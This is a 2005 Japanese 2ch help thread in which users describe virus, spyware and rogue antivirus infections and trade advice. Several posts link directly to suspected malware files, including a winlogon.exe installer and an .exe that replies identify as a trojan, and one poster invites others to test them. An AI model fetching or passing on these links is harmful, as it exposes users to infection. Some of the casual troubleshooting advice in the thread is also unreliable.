Firefoxならそう言うだろうな
636名無しさん@お腹いっぱい。:2005/05/27(金) 22:49:19
ウイルスに感染したようです。
ブラウザのホームページが勝手に書き換えられ、インターネットオプションで変更しても
すぐに戻されます。時々変なところにアクセスするようです。
あと、ブラウザに見慣れない英語のツールバーが表示され、消せません。そこをクリックすると
またどこかにアクセスします。

これってなんていうウイルスでしょうか? いまウイルススキャンしてる最中ですが。
637名無しさん@お腹いっぱい。:2005/05/27(金) 22:51:42
ちなみにNortonAntiVirusのオートプロテクトをオフにした状態でnyをやってから
おかしくなりました。
638ぼるじょあ ◆yBEncckFOU :2005/05/27(金) 23:01:47
( ・3・)≡○#) ∀・)∴.;

(・3・)エェー 何事もなかったように再開ですYO
639名無しさん@お腹いっぱい。:2005/05/27(金) 23:07:32
ちなみにホームページが
http://balabolka.biz/start.html
に書き換えられています。
640名無しさん@お腹いっぱい。:2005/05/27(金) 23:35:37
ローカルルール・スレのテンプレをこうまで鮮やかに悉く無視してると
いっそ爽快だな。
641名無しさん@お腹いっぱい。:2005/05/28(土) 00:26:01
すいません。会社で今、残業してるんですけど、
ちょっと製品検索したら、4段階ぐらい飛ばされて、
見たこともないような漢字のページになって、
しかもウイルスの警告がでまくってます。
そしたら、キーボードの入力をうけつけなくなりました。

トホホ。パスワードわかんないから挙げなおしたら使えない・・・・
どうしたらいい?もう終電ないし・・・
642名無しさん@お腹いっぱい。:2005/05/28(土) 00:30:48
>>641
どうやって書いてんだYo
携帯?
643名無しさん@お腹いっぱい。:2005/05/28(土) 00:43:27
>>642
部長席の端末上げてます。
パスワード知ってるので(w
ただ、これで開発すると、
ログに残っちゃうんで
ダメなんですよ。
644名無しさん@お腹いっぱい。:2005/05/28(土) 00:50:53
>>643
焦るもの解るが>>1くらい見たら?
きちんと書けば誰か親切な香具師が現れるかも。
645名無しさん@お腹いっぱい。:2005/05/28(土) 01:03:04
>>644
もう仕方ないおで電話で聞きました。
646名無しさん@お腹いっぱい。:2005/05/28(土) 01:59:30
SPYWARENO!っていうアンチスパイウェアソフトを装った奴知ってます?

知人が感染したPCを見に行ったんだけど、デスクトップにWINDOWS ERRORとでっかく表示されて
アイコンをクリックすることも出来ず・・
ソフトとエクスプローラ強制終了と再起動で多少マシになるんだけど
再起動後に毎回ネットから体験版?をダウンロードしてインスコしてレジストリもご丁寧に元通り・・

で、毎回スパイウェアが入ってるよと警告してきて、レジストを迫ってくる 金払ってレジストしても直らないとは思うが・・
2時間いろいろ修復しまくったけど、どうしても直らずあきらめて再インスコしました・・

今調べたら、結構海外で被害者がいるみたい
ソフトメーカーのどう考えてもマッチポンプなんだけど、トボけてるっぽい
ttp://netrn.net/spywareblog/archives/2005/05/22/new-rogue-anti-spyware-spypareno/

ここに出てる
ttp://vxiframe.biz/adverts/progs/winlogon.exe
がスパイウェアのインストーラーかも
漏れは諦めたので、誰か実験してホスィ


日本語サイトだと、ググっても1件?しかヒットしなかった
ttp://kosuge.kdn.jp/anti/bbs/bbs.cgi?mode=allread&pastlog=0028&no=1293&page=10&act=past
647名無しさん@お腹いっぱい。:2005/05/28(土) 02:12:32
>>646

>>507-508

>>510

このパターンが多い。
ちなみにHDDを暗号化して、それを人質に料金を要求するのもこのてのもの。
648名無しさん@お腹いっぱい。:2005/05/28(土) 02:19:09
>>646
その手の話はこっちでした方がいいんじゃね?
【総合】スパイウェア予防駆除 Part7
http://pc8.2ch.net/test/read.cgi/sec/1111917202/
649名無しさん@お腹いっぱい。:2005/05/28(土) 02:55:45
W32.Netsky.P@mm が前から届いてて
メルアド変えてとりあえずアドレスに登録してた人に
通知しました
しかし新しいPCでメール設定しても
また届きます
これは自分が感染してるわけではなく
通知した人の誰かがかかってるってことですかね?
650名無しさん@お腹いっぱい。:2005/05/28(土) 06:28:40
>>649
普通に考えれば、その可能性が一番高いな。
651名無しさん@お腹いっぱい。:2005/05/28(土) 10:18:32
OZmall閉鎖。
http://www.ozmall.co.jp/
652名無しさん@お腹いっぱい。:2005/05/28(土) 10:19:00
つーかメアド変える意味がわからん
653名無しさん@お腹いっぱい。:2005/05/28(土) 11:35:44
当方、トレンドマイクロのinternet securityを使っていますが、

BIOSリセット後にパターンファイルをUPしたみたいで、last updateが2004/1/1になってしまいました。
XPのウィルス対策が最新の状態ではありませんとでて非常に宇材です。

サーバに新しいのがあがれば解決すると思いますが。。
654名無しさん@お腹いっぱい。:2005/05/28(土) 11:38:19
>>653
貴様が何を言っているのかわかりません
トレンドマイクロにはinternet securityなんてソフトはありません
何を求めてるのかがわかりません
日本語を勉強しなおして出直してこいです
655名無しさん@お腹いっぱい。:2005/05/28(土) 11:42:15
>>654
日本語言ってんだろ低脳。お前が日本語勉強しなおしてこいよ。
656名無しさん@お腹いっぱい。:2005/05/28(土) 11:51:55
>>655
まず、トレンドマイクロのinternet securityなんて存在しないわけだが
657名無しさん@お腹いっぱい。:2005/05/28(土) 11:54:26
>>656
俺に言われても困るんだが
658名無しさん@お腹いっぱい。:2005/05/28(土) 12:03:41
>>657
お前は理解できたんだろ?
659名無しさん@お腹いっぱい。:2005/05/28(土) 12:04:17
660名無しさん@お腹いっぱい。:2005/05/28(土) 12:10:24
661名無しさん@お腹いっぱい。:2005/05/28(土) 12:19:02
英語版かねぇ・・・
Trend Micro PC-cillin Internet Security 
ttp://www.trendmicro.com/en/products/us/personal.htm
662名無しさん@お腹いっぱい。:2005/05/28(土) 12:21:37
>>653
再インスコすれば?
663名無しさん@お腹いっぱい。:2005/05/28(土) 13:43:34
【使用OS】 WinXP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】 ノートン先生
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】
脅威警告でTrojan Houseというのが検出されましたが、削除できませんでしたという報告が出て、
スキャンしましたが検出できませんでした。セーフモードでスキャンしなおそうとすると、なぜかノートンのエラーが出て立ち上がりませんorz
【別のオンラインスキャンしたならその結果は】 今やってます
【症状を具体的に、分かる限りすべて書く】 自分ではまだ変わったことには気づけてません。
【何をしたらそんなことになったのか】あるスレを覗いたところ、引っかかりました。
【これまでにとった措置】
初めてのことなので、とりあえずノートン先生の言うとおりに復元機能切って
うpdate最新にしてセーフモードでスキャンしようとまではしました。
が、ノートン先生立ち上がらず。
Torojan Houseというウィルス情報も先生の説明が日本語でないのでわかりません…
【その他の質問】 トロイの木馬系というのは、よくわからないんですが、見つからないそうなんで自分で削除すればそれで大丈夫なんでしょうか。アドバイスよろしくお願いします。
664名無しさん@お腹いっぱい。:2005/05/28(土) 14:42:44
すいません教えてほしいのですがブラクラふんでしまい
ウイルスアラートがでてしまったのですがひとつウイルスが削除できません
でしたみたいなのがでたんですがどうしたらいいでしょうか?
トレンドでオンラインスキャンしたらHTML_REDIR.Aというウイルスでした
ウイルス対策ソフトはVirus scanの最新版をつかっても
アラートに反応しませんでした
パソコン初心者なのでどうしたらいいかわからません
ウインドウズXPですああぁ〜どうしよう・・・・
誰か教えてください・・・・
めちゃくちゃ不安なんです
665名無しさん@お腹いっぱい。:2005/05/28(土) 14:45:06
とりあえずテンプレにならった形で質問してね。
そうしないと困っちゃう。
666名無しさん@お腹いっぱい。:2005/05/28(土) 14:50:13
ノートンインターネットセキュリティで『ウイルスが検出しました』って出てきて『ファイルを修復できません』って出てきたんですけどどうしたらいいですか?
667名無しさん@お腹いっぱい。:2005/05/28(土) 14:54:34
【使用OS】 windowsXP
【WindowsUpdateしてるか】ウイルスのupデートのことですか?
【AntiVirusは何を使っているか】マカフィーのVirus scan7.1
【ちゃんとUpdateしてるか】 やってみましたが最新版になってました
【スキャンした結果(ウイルス名・発見場所)】もう一度マカフィーでしたら発見されませんでした
【別のオンラインスキャンしたならその結果は】 【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】 HTML_REDIR.A
【別のオンラインスキャンしたならその結果は】 なんか削除できませんみたいな表示がでました
【症状を具体的に、分かる限りすべて書く】今のところ何もおきてませんが・・
【何をしたらそんなことになったのか】2ちゃんのブラクラをふんでしまいました
【これまでにとった措置】 何もしてません・・・
【その他の質問】 どうしたら削除えきますか?
リカバリーしなくてちゃいけませんか?


【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

668名無しさん@お腹いっぱい。:2005/05/28(土) 15:08:59
>>667
>【WindowsUpdateしてるか】ウイルスのupデートのことですか?

ウインドウズのアップデートです
669名無しさん@お腹いっぱい。:2005/05/28(土) 17:13:23
670名無しさん@お腹いっぱい。:2005/05/28(土) 17:23:36
>>667
削除してくれるオンラインスキャンなんてあるか ボケ
671名無しさん@お腹いっぱい。:2005/05/28(土) 17:31:42
>>667
【AntiVirusは何を使っているか】マカフィーのVirus scan7.1
672名無しさん@お腹いっぱい。:2005/05/28(土) 18:55:16
>>667
見てるのか?
それはセキュリティホールをついてくるタイプで俗に言うダウンローダーってやつか
それ単体での破壊活動はない
ダウンロード先のサイトは氏んでるので現時点でそのウイルス(?)の脅威は無い
つーかウインドウズのアップデートをしる
673名無しさん@お腹いっぱい。:2005/05/28(土) 19:07:49
バカが5匹もつれた
674名無しさん@お腹いっぱい。:2005/05/28(土) 20:01:59
>>669
いいねえ
675名無しさん@お腹いっぱい。:2005/05/28(土) 20:14:02
タスクマネージャーにNEC.EXEとあるが大丈夫かな
676名無しさん@お腹いっぱい。:2005/05/28(土) 20:30:59
パソコン初心者でよく分からないのですが、フリーのAVGのダウンロードは
どのようにすれば出来るのか教えてください。またはやり方などが書かれた
サイトを教えて下さい。お願いします。
677名無しさん@お腹いっぱい。:2005/05/28(土) 20:44:05
>>676
なぜ2chの中からここを探し出せる能力を持ちながらそれを使おうとしない?
googleで「AVGのダウンロード」で検索しろ。一発だ。
678名無しさん@お腹いっぱい。:2005/05/28(土) 21:38:56
つーかAVGのダウンロードの仕方は
AVGのホムペに書いてある
679名無しさん@お腹いっぱい。:2005/05/28(土) 21:48:36
つーかそんなことも自分でできない初心者がフリーなんか使うな
680名無しさん@お腹いっぱい。:2005/05/28(土) 21:55:24
>>676
ttp://free.grisoft.com/doc/Get+AVG+FREE/lng/us/tpl/v5
ここのavg70free_322a531.exeをDLすれば委員だと思うよ。
681名無しさん@お腹いっぱい。:2005/05/28(土) 23:46:35
本日友人が日本テレビの西尾アナウンサーのファンサイトを見ていて
ウィルスに感染しました。
ウィルス名?はspywareno! というみたいです。
ピーっと音がしてウィンドウズが使えなくなったみたいなのですが
これはどう対処したらよいのでしょうか?
682名無しさん@お腹いっぱい。:2005/05/29(日) 00:43:10
これってウイルス?もしくは、壊れたexe?
ノートン、バスターでスキャンしたけど何も反応なしでした。(謎)
教えてエロイ人!!

ttp://kasamatusan.sakura.ne.jp/cgi-bin2/src/matu2980.exe.html
683682:2005/05/29(日) 00:45:22
あっ、アイコンがXPの標準フォルダーと同じになってるので、
間違ってクリックしないように、お気をつけ下さい。
684名無しさん@お腹いっぱい。:2005/05/29(日) 01:25:34
>アイコンがXPの標準フォルダーと同じになってる

なんか、それだけでメチャメチャ怪しいのだが。
何をしようとしてDLして、んでどうなったん?
685名無しさん@お腹いっぱい。:2005/05/29(日) 01:30:40
>>684
ですよね。。
知り合い(といっても遠い)人から色んなファイルと共に送られてきたんですけど、
すごく怪しいかおりがしたのでちょっと聞いてみたくて。

ぽっちっとやってしまったら、「無効なEXEです」って出て、
今のところは何も問題ないのですが。。。

中途半端な知識でメモ帳で開いたり色々したのですが、
よくわからず、聞いてみた所存です。
詳細わかりますでしょうか?泣
686名無しさん@お腹いっぱい。:2005/05/29(日) 01:31:44
山田の亜種とかじゃないのか?
687682:2005/05/29(日) 01:35:20
>>686
一応オリジナルのタイムスタンプが2週間以上前なので、
亜種でももう対応しててもおかしくないかなぁっと思っているのですが・・・。

プログラムとか詳しい方がいれば何かわかるかなっと思いまして。
お騒がせして申し訳ないです。
688名無しさん@お腹いっぱい。:2005/05/29(日) 01:38:54
>>687
亜種多過ぎて、メーカー対応できてないはず>山田
クリックしてしまったなら、一応、山田に感染してないかチェックしといた方がいいんじゃない?
689名無しさん@お腹いっぱい。:2005/05/29(日) 01:41:23
使用OS=WIN MX
アップデート=している
アンチウィルス=入っている
スキャンした結果=していない
これまでに取った措置=一時ファイルの削除
これにて一件落着
690名無しさん@お腹いっぱい。:2005/05/29(日) 01:43:55
eTrustとSybariが"Win32/DelWin.L!Trojan"と判定しているほかは無反応
アヤしい…
691682:2005/05/29(日) 01:47:13
>>688
一応山田チェッカーはやってみました。
問題はなかったです。

でも、山田って再起動してからでないと活動しないですよね?(←違いましたっけ?)
まだぽっちっとしてから、再起動は怖くてやってないんです。
山田なら、駆除できるそうなのでなんとかなると思いますが、
ドライブフォーマットとかだとしゃれにならないので・・・。

プログラムの知識がない自分が情けない・・・。(ノД`)
692682:2005/05/29(日) 01:53:17
>>690
それって、私がうpしたやつのことでしょうか!?
でしたら駆除方法等教えて頂きたいです。
693名無しさん@お腹いっぱい。:2005/05/29(日) 02:13:22
>>692
要はここで調べただけなんだが
ttp://www.virustotal.com/flash/index_en.html
694682:2005/05/29(日) 02:30:11
>>693
こんなページあるんですね。参考になりました。
これからどうしよう。。

DelWin.L!TrojanってやっぱりWindowsあぼーん系ってことかな。
こまった。。誰か助けて。。(ノД`)
695名無しさん@お腹いっぱい。:2005/05/29(日) 02:35:54
しろうとですいません。
ttp://dayoore.hp.infoseek.co.jp/
このサイトが現在荒らされてる見たいなんですけど、このページから「飛ぶ!」
を選んで掲示板に行くのですが、それだけでウイルスに感染するみたいなんです。
で、感染してしまったわけなんですが、どうしたら良いのか分らないので来ました。
自分でわかる事を書きます。

自分のPCはウインドウズ98です。
PCに最初から入ってた対策ソフトは更新してません。
症状は、1スタートページを替えられて元に戻せ無い事。2デスクトップに最初はSpayware
Avenger とかいうショートカットが出来てたのでゴミ箱で削除した所、Virus Hunter
Security とか言うショートカットができてました・・
696名無しさん@お腹いっぱい。:2005/05/29(日) 03:01:28
>>695
それはスパイウェアっぽいんだが
697名無しさん@お腹いっぱい。:2005/05/29(日) 03:18:58
>>696
どうしたらいいのですか?
698名無しさん@お腹いっぱい。:2005/05/29(日) 03:22:44
>>697
スパイウェア駆除ソフト入れる

【総合】スパイウェア予防駆除 Part7
http://pc8.2ch.net/test/read.cgi/sec/1111917202/
の11-15辺りを読め
699名無しさん@お腹いっぱい。:2005/05/29(日) 03:23:48
ありがとうございます。
700名無しさん@お腹いっぱい。:2005/05/29(日) 03:59:36
誰かお助けください…。
数日前からウイルス入りの素敵メールが
1日に何通も来るようになりまして…。
1度感染してしまった分については、間違いなく
駆除したのですが・・・。
この手のメールが来なくなるにはどうしたらよいでしょう?
因みに、ノートンアニバーサリー2005使用
ウイルス定義は常に更新、システム完全スキャンは
毎週やっているので、とりあえず問題ないとは思うのですが、
何せ素人なもので自信ないです。
送られてくるウィルスはW32Mytob.AJ@mmとか
最初にW32ってつくワームが色々と…。
701名無しさん@お腹いっぱい。:2005/05/29(日) 04:03:58
>>700
メアド変えるか、
スパムとして、はじけばいいんじゃない?
702名無しさん@お腹いっぱい。:2005/05/29(日) 04:07:42
>>701
え?メアド変えたら来なくなるんすか?
っていうか何が原因なんでしょう?
今後の参考になるので、ご教授いただけると・・・
非常にありがたいのですが^^;
703名無しさん@お腹いっぱい。:2005/05/29(日) 04:13:37
>>702
ウィルスメールが来るのは、君が感染したから、来るわけじゃないよ
ウィルスにもよるけど、メールで感染するタイプなら、
君のアドレス知ってる誰かが感染して、無作為に送ってきてるんだろうから、
君のアドレス変えれば来なくなる。
他の対策だと、有料だけどプロバなんかのウィルスメールチェックでもウィルスメールは
はじいてくれる。
704名無しさん@お腹いっぱい。:2005/05/29(日) 04:15:12
他にも
ttp://homepage1.nifty.com/eimei/
のSpam Mail Killerなんかのスパム対策ソフトで添付ファイル指定できる奴で弾くとか
705名無しさん@お腹いっぱい。:2005/05/29(日) 06:14:00
【使用OS】 windows XPpro SP2
【WindowsUpdateしてるか】自動更新しています。
【AntiVirusは何を使っているか】 ノートンアンチウイルス2003
【ちゃんとUpdateしてるか】 自動更新しています。ウイルス定義ファイル2005/5/27
【スキャンした結果(ウイルス名・発見場所)】 C:\WINDOWS\system32\cssrs.exe PWSteal.Trojan
【別のオンラインスキャンしたならその結果は】 していません。
【症状を具体的に、分かる限りすべて書く】 PC起動後、cssrs.exeが外部に接続しようとします。ノートンインターネットセキュリティーで通信を止めて、cssrs.exeのプロセス停止後にノートンで削除しています。cssrs.exeを削除しても再起動後には復活します。
【何をしたらそんなことになったのか】 海外サイトでフラッシュを見ていた時にブラクラを踏みました。
【これまでにとった措置】
ttp://www.symantec.com/region/jp/sarcj/data/p/pwsteal.trojan.html
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FAGOBOT%2EFX&VSect=T
シマンテック、マイクロトレンド等に掲載されていた対処法をしてみました。
しかし、載っている対処法ではレジストリに該当するエントリが無く、
レジストリのどの部分に書き込まれているのか、散々探してみたものの、自力では探しきれませんでした。

対処法の分かる方、アドバイスお願いします。
706名無しさん@お腹いっぱい。:2005/05/29(日) 10:30:21
>>705
システムの復元を無効にするとかじゃないの?
707705:2005/05/29(日) 11:10:13
>>706
システムの復元は無効にしています。
708名無しさん@お腹いっぱい。:2005/05/29(日) 12:10:03
>>705
起動時に実行される圧縮されていてソフトでは発見出来ないファイルになっている親玉インストーラーが悪さをしています
709名無しさん@お腹いっぱい。:2005/05/29(日) 16:52:16
>>708
mscpnfigでスタートアップを向こうにすれば防げるのかね。
710名無しさん@お腹いっぱい。:2005/05/29(日) 18:49:45
>>709
それじゃ無理
711名無しさん@お腹いっぱい。:2005/05/30(月) 01:01:22
山田ウィルス情報
http://127.0.0.1/
現在出回っている亜種にはこれをやっても無駄なのも出ていますので
安心したいなら山田チェッカーを落として確認したほうがいいよ
ニュイルス日誌 (山田チェックツールあり)
ttp://blog.livedoor.jp/antiny_virus
山田チェックツールの使用方法は
×××××××(´・ω・)カワイソス 山田ヲチスレ 9×のテンプレに
あるので読んでください

まとめサイト
ttp://www2.atwiki.jp/kawaisosu/
山田ウィルスまた亜種が進化したらしい

名前:通報屋 ◆Y39/vakKjY [sage] 投稿日:2005/05/29(日) 23:12:43 ID:CZf5CLP+0
実機試験してきた。バージョンはMellpon/07(おそらく)
適当に中を覗いてみた結果:
テキスト=ASCII "リソースを覗くなと。。。リソースを弄るなと。。。文字列を覗くなと。。。文字列を弄るなと。。。
(´・ω・) カワイソス(´・ω・) カワイソス(ry

後ろから突いちゃ(´・ω・) カワイソス
実機試験したらこうなりました:
・EXEを実行すると、内部に持ってるJPGを解凍
・自分自身を削除
・%Program Files%の中のランダムなフォルダに寄生
・HKEY_LOCAL_USERにlMJPMlGというエントリで自動起動を設定
・C.html C.zip等を作る

これくらい。
おそらくmellpon/07だから最新版08ある場合にはキボンヌ
712名無しさん@お腹いっぱい。:2005/05/30(月) 05:08:28
今日ビックカメラに行ったら、
livedoor の PandaSoftware TruPrevent というソフトの
チラシをもらったんだけど、知ってる人いる?

・未知のウイルス(定義ファイルがない)にも対応している
・Norton や マカフィーなどと併用し、これらが取りこぼしたウイルスを
 このソフトがブロックする

というふれこみだそうです。

http://soft.livedoor.com/panda/
713名無しさん@お腹いっぱい。:2005/05/30(月) 14:03:32
>>712
>>270にも登場してるPanda Softwareのアンチウイルス製品で
ライブドアが日本販売代理権を取得しただけ。
714名無しさん@お腹いっぱい。:2005/05/30(月) 22:44:05
【使用OS】 windowsXP
【WindowsUpdateしてるか】最近はしていません
【AntiVirusは何を使っているか】ノートンAntiVirus2003
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 Unix.Penguin
(別名: ~UNIX/Jaded, SH/Penguin.A, Linux/Penguin) 種別: トロイの木馬
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】 Unix.Penguin は、Unix上で動作する単純かつ悪質なシェル スクリプト プログラムです。
Norton AntiVirusのUnix.Penguin検出技術は、システム パスワード データ ファイルを
外部に送信しようとするUnix シェル スクリプトをすべて検出します。
【何をしたらそんなことになったのか】わからないですね・・・。
一日に物凄い量のメールが来るときがありますが・・・。一応ノートンは削除したって言ってくれるんですけどね・・。
【これまでにとった措置】 今のところ何もしてません
【その他の質問】 対処方法はあるんでしょうか?
「不審なシェル スクリプト(自分で書いた記憶がないシェル スクリプトなど)
が存在する場合、そのスクリプトを削除するか、
あるいは、Unixの管理者に報告してください。」と書いてあったんですが
意味が全然解らないです・・・。どなたか解る方いらっしゃいませんでしょうか?


715名無しさん@お腹いっぱい。:2005/05/30(月) 22:48:26
>>714
誤検出なので気にしない。
716名無しさん@お腹いっぱい。:2005/05/30(月) 23:37:31
>>715
本当ですか?それなら気が楽になりますが・・・。
というか誤検出って頻繁にあるものなんでしょうか?
717名無しさん@お腹いっぱい。:2005/05/30(月) 23:41:10
>>716
一概に「誤検出」とも言い切れんところではあると思う。
ただ、Windows系ならUnix系の不正コードが検出されたところで影響する可能性は非常に低いのは確かだけどな。
718名無しさん@お腹いっぱい。:2005/05/30(月) 23:41:29
>>716

      _______                     __
    // ̄~`i ゝ                    `l |
    / /        ,______   ,_____    ________  | |  ____ TM
   | |     ___ // ̄ヽヽ // ̄ヽヽ (( ̄))   | | // ̄_>>
   \ヽ、   |l | |    | | | |    | |  ``( (.  .| | | | ~~
      `、二===-'  ` ===' '  `===' '  // ̄ヽヽ  |__ゝ ヽ二=''
                         ヽヽ___//   日本
  _____ _____  ______  _______
  |  ウェブ  | | イメージ | | グループ | | ディレクトリ |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ._________________
      |ノートントラップ                │・検索オプション
      └────────────────┘・表示設定
         | Google検索 | I'm Feeling Lucky |  ・言語ツール
          ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ○ウェブ全体から検索 ◎日本語のページを検索
 
 
 
 広告掲載について - 人材募集 - Googleについて - Google in English
  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄
      c2004 Google - 4,285,199,774ウェブページから検索
719名無しさん@お腹いっぱい。:2005/05/31(火) 11:37:21
ヽ(`Д´)ノウワァァン
720名無しさん@お腹いっぱい。:2005/05/31(火) 13:24:11
4WDウィルスとはどういうのですか?
感染してるか見つける方法
駆除方法教えてください
721名無しさん@お腹いっぱい。:2005/05/31(火) 13:25:31
722名無しさん@お腹いっぱい。:2005/06/01(水) 06:37:04

※緊急※

第二の価格コム事件とも言える「ozmall」のサーバがクラックされた事件の場合では、
現時点でマカフィーとアンラボ製品が問題のウイルスを検出できてます。
ttp://www.ozmall.co.jp/050530/virus.html#soft
                       検出 駆除
マカフィー(Managed VirusScan)    可   可
アンラボ(V3ウイルスブロック2005)  可   可
NOD32                   不能 不能
723名無しさん@お腹いっぱい。:2005/06/01(水) 16:16:16
【ドモコ】 winnyキンタマウイルス感染 【テラヤバス】  
http://news19.2ch.net/test/read.cgi/news/1117609611/
NTTドコモ東海が静岡、愛知、岐阜県内に設置した携帯電話基地局
約800カ所の所在地や入局方法などをまとめた「社外秘」扱いの資料が、
ネット上に流出していることが分かった。事態を重視した同社はすべての
鍵を付け替えるなど緊急対策を実施した。ファイル交換ソフト「ウィニー」の
ウイルス感染が原因とみられる。
724名無しさん@お腹いっぱい。:2005/06/02(木) 10:16:45
age
725名無しさん@お腹いっぱい。:2005/06/02(木) 18:22:13
うう〜、検索してたら知らないうちに、hostファイル書き換えられていた。
どこのサイトだ。一体・・・保護にはどのようなソフトがいいのだろう(;´Д`)

O1 - Hosts: 64.91.255.87 www.dcsresearch.com
726名無しさん@お腹いっぱい。:2005/06/02(木) 18:57:22
>>725
一番簡単なのはhostsファイルのプロパティで「読み取り専用」属性にチェックしとくこと。
727名無しさん@お腹いっぱい。:2005/06/03(金) 00:07:31
>>682
そのファイルはKasperskyによってめでたく「Trojan.Win32.KillWin.aj」と認定されました
728名無しさん@お腹いっぱい。:2005/06/03(金) 11:02:57
Osama Bin Ladenが捕まった時のスライドショーですみたいな本文つきで、
zipで圧縮されたpics.scrが、今朝から届きだしたのですが、これって新種?

バスタは無反応です。
729728:2005/06/03(金) 12:52:20
これみたいです。
http://www.mcafeesecurity.com/japan/security/virD.asp?v=Downloader-ABL

バスタ、未だ無反応
730質問です:2005/06/03(金) 16:39:36
http://download.msgplus.net/files/MsgPlus-354.exe
↑のサイトで
MSNメッセでプラスをDL中に
アドウェアっていうのに協力すると感染するウィルスの対策方法を教えてください

m(_ _)m

OS:WIN
対策:とってないです

人ずてで、聞いた話なので詳細わからなくてすみません…
731名無しさん@お腹いっぱい。:2005/06/03(金) 17:17:46
祭り中。かなりデカくなる予感。(イッチー以上)

【患者晒し】証拠隠滅中の放尿カルパッチョ 11g【放射能洩らし】
http://news19.2ch.net/test/read.cgi/news/1117781688/

・オペ後の患者写真、遺体解剖写真をHPに無断掲載
・放射性物質トリチウムを川へ垂れ流し  ※近所の人は注意を
・飲酒運転告白
・各地の温泉で浴槽へ度重なる放尿

現在あわててHPの写真削除中!でももう遅い・・・・
ttp://www4.osk.3web.ne.jp/%7Eciaociao/top.htm

まとめ
ttp://www.geocities.jp/carupaccio2005/
ttp://wave.prohosting.com/~john1252/index.html
732質問です:2005/06/03(金) 18:23:39
このスレで良いのか疑問ですが、どなたか教えてください。
【使用OS】
  検出したパソコンはWinXP
【WindowsUpdateしてるか】
  すべて。
【AntiVirusは何を使っているか】
  ノートンアンチウイルス2005
【ちゃんとUpdateしてるか】
  している
【スキャンした結果(ウイルス名・発見場所)】
  (後述)
【別のオンラインスキャンしたならその結果は】
  (後述)
733質問です:2005/06/03(金) 18:24:15
【症状を具体的に、分かる限りすべて書く】
  会社の社内LANにての問題、接続されているパソコンは500台超。
  当方のパソコンにインストールしてあるノートンアンチウイルス2005の「ワームプロテクト」がワームを遮断したと言い出す。
  (会社標準のウイルス検査ソフトがしょぼい為、自腹でインストール。)
  具体的なログは下記の通り。
  「ルールDefault Block Bia Trojan horse」がxxx.xxx.xxx.xx、1042を遮断しました。」
(注、上記のIPアドレス部分は伏せさせて頂きました。)
   現在、2カ所からぴったり同じ時刻に攻撃が来る。
   その2カ所はパソコンでなく、メルコ製NASの「LinkStation」。
   メルコに問い合わせるも、「弊社のNASは独自OSなのでウイルス等に絶対に感染しません」と、とりつく島無し。
   もともと1台だけだったのが先日2台目にも感染したようだ・・・。
【何をしたらそんなことになったのか】
   不明。
【これまでにとった措置】
   NASに対するウイルス検査方法と駆除方法が判らず困っている。
   会社側は、「メルコが問題ないと言っているのだから、ノートンの誤検出」と無視。
【その他の質問】
   NAS自身のOSはメルコが言うように、本当にウイルス等に感染しないのか?
   そして、そもそも本当にワームからの攻撃なんでしょうか?
LinkStationのOSがウイルスに感染しているかどうかの検査方法等を、ご教授ください。
734 :2005/06/03(金) 18:57:47
>>730
C2lopとCoowWebSearch(?)らしいな
http://www.higaitaisaku.com/msnplus.html

アドウェアを入れるかインストール時に選択できるらしいよ。
735abc:2005/06/03(金) 19:27:12
abc
736名無しさん@お腹いっぱい。:2005/06/03(金) 19:59:34
【使用OS】 Win89
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 セキュリティソフト?入れてない
【ちゃんとUpdateしてるか】 してない
【スキャンした結果(ウイルス名・発見場所)】
  http://housecall.antivirus.com/housecall/start_jp.asp?i=n
【別のオンラインスキャンしたならその結果は】
  開くと、現在のセキュリティ設定では、このページの ActiveX …
【症状を具体的に、分かる限りすべて書く】
  ウイルスに侵入されないのに、黄色い服を着た人がソフトの販売を勧めてくる
【何をしたらそんなことになったのか】
  セキュリティが脆弱になるOSやソフトのバージョンアップをしない
【これまでにとった措置】
  セキュリティの設定を上げた
【その他の質問】
  古いPCなので手がすべったりしなければウイルスに侵入されたりしませんよね?
737名無しさん@お腹いっぱい。:2005/06/03(金) 20:14:13
>>736
セキュリティ高=ActiveXが使えない=ActiveXを使用したオンラインスキャンはできない
つか、Updateもセキュリティ対策もせずにウィルス感染しませんよね?て・・・
↓読んで勉強してから出直して来い。

ttp://eazyfox.homelinux.org/
738名無しさん@お腹いっぱい。:2005/06/03(金) 20:16:26
【使用OS】 winXP
【WindowsUpdateしてるか】PC購入が3日前で2日前にしました
【AntiVirusは何を使っているか】 ノートン Antivirus2005
【ちゃんとUpdateしてるか】 してません
【スキャンした結果(ウイルス名・発見場所)】bloodhoun Exploit.6 場所はわかりません
【別のオンラインスキャンしたならその結果は】してません
【症状を具体的に、分かる限りすべて書く】 他のページへの移動が遅かったり、読み込みが急激に不安定になりました
【何をしたらそんなことになったのか】 なんだったかな いろんなURLに飛んでたのでその時かも
【これまでにとった措置】 色々調べましたが意味がわからないので何もしてません
【その他の質問 なし

2chは前からやってたのですが、PCのことについてはさっぱりなので言葉足らずで申し訳ないです
739名無しさん@お腹いっぱい。:2005/06/03(金) 20:38:10
>>737
トップページはめんどくさいから読まない。
要点をまとめてここに書けば読んであげます。
「これまでにとった措置」に書いているように、
セキュリティ対策を何もしていないわけではなく、意図せずにウイルスに
感染するということありえない状態にしてあります。
740名無しさん@お腹いっぱい。:2005/06/03(金) 20:50:17
>>737
どこからどう見てもネタ100%じゃねーか(笑)
そんなもんいちいち構うなよ
741名無しさん@お腹いっぱい。:2005/06/03(金) 21:15:13
>737
馬鹿は放置したほうがいいよ
